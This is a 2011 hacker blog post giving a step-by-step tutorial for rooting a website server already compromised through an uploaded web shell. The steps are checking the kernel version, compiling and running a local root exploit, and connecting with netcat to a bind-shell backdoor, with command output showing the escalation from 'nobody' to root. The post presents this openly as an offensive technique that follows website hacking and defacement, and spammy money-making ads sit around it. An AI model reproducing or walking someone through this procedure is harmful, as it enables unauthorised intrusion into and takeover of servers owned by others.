BLACK BURN HACKER. Powered by Blogger.

Real Money Instantly

 

Saturday, December 10, 2011

r00ting Tutorial bY BLACK BURN

2 comments

Rooting Tutorial

Okey i have some free time so i can spend it the right way.First See The Video. All of us know how to hack a websites,uploading shell to them and defaceing them.So you really think this is everything you can do with that small pice of code? Nah there are a lotz of other things that you cannot imagine doing it with that shell.One of those things is Rooting Process also know as Privilge Gaining Process and there are a lotz of other names.So for this work i prefer the GNY Shell wich is the most Usefull shell and have a lotz of toolz in it. So letz start.
What we need?
-Shell atteced to an WebSite
-Backconnection Script
-Explot
-And a bit knowing about Unix Systems

So letz start the Journey to the 0Day.

First what we need to check is the kernel version we are going to do that by executing this command in the command filed or the console in the shell:
Code:
uname -a
and it will return the version of the kernel in this case:
Code:
Linux  2.6.18-194.11.1.el5PAE #1 SMP Tue Aug 10 19:48:16 EDT 2009 i686 i686 i386 GNU/Linux
So now what we do is to search an exploit for that kernel also know as local root exploit but letz clear what is "EXPLOIT".
-Exploit
That is a code that give us a privilage to gain root priv and have access to the whole server.Now imagine a house you are the attacker wonna to get into the house the lock is old in this case that is the kernel and we have a key[EXPLOIT] that is going to open that door and get into the house[SEVER].So is this clear? What is Exploit? Good we move on...

After we search for exploit and we find the right one we upload it to the server.
Now if the exploit is not compailed we are going to do that by executing the following command:
Code:
gcc filename.c -o filename
So this will compail the code and we are set to go but not quite?Why? Well we also need to add 777 privilages to the exploit.To do that we execute the following command:
Code:
chmod 777 filename
Now we are ready to do a backconnecting and execute the exploit.
As i said we are going to use GNY Shell go to Backdoor section and set your PORT number
i set it like 7777 or 7887 but its your wish and choise to do that.
After we set the backdoor now we go to
Code:
RUN->CMD
and now we go to the directory where is our NetCat in my case
Code:
C:\nc
and now we write the next command in our CMD/if your on Linux you write the same command
Code:
nc IP of the Server PORT
In this case its:
Code:
nc 127.0.0.1 7777
And the following sentence is poped out when i write that:
Code:
    :: w4ck1ng-shell (Private Build v0.3) bind shell backdoor ::
now we execute id to check who we are:
Code:
id
and get:
Code:
id=99(nobody) gid=99(nobody)
so we are nobody hmmm not for long.Now we execute our exploit that we have compailed and set him 777 priv
Code:
./exploitname or ./filename
and after it finish we check again if we are still nobody:
Code:
id
and we get:
Code:
id=root gid=root groups=root
w00t!!!!! we are now root the most powerfull user in the UNIX system l0l
Now we can go where ever we wonna and do what ever we have on our mind.

I Hope You Enjoy It ! If you have any question Write them down and feal free to comment.

2 comments:

 

7 Years Earning Experience

The Earning Source You Can Trust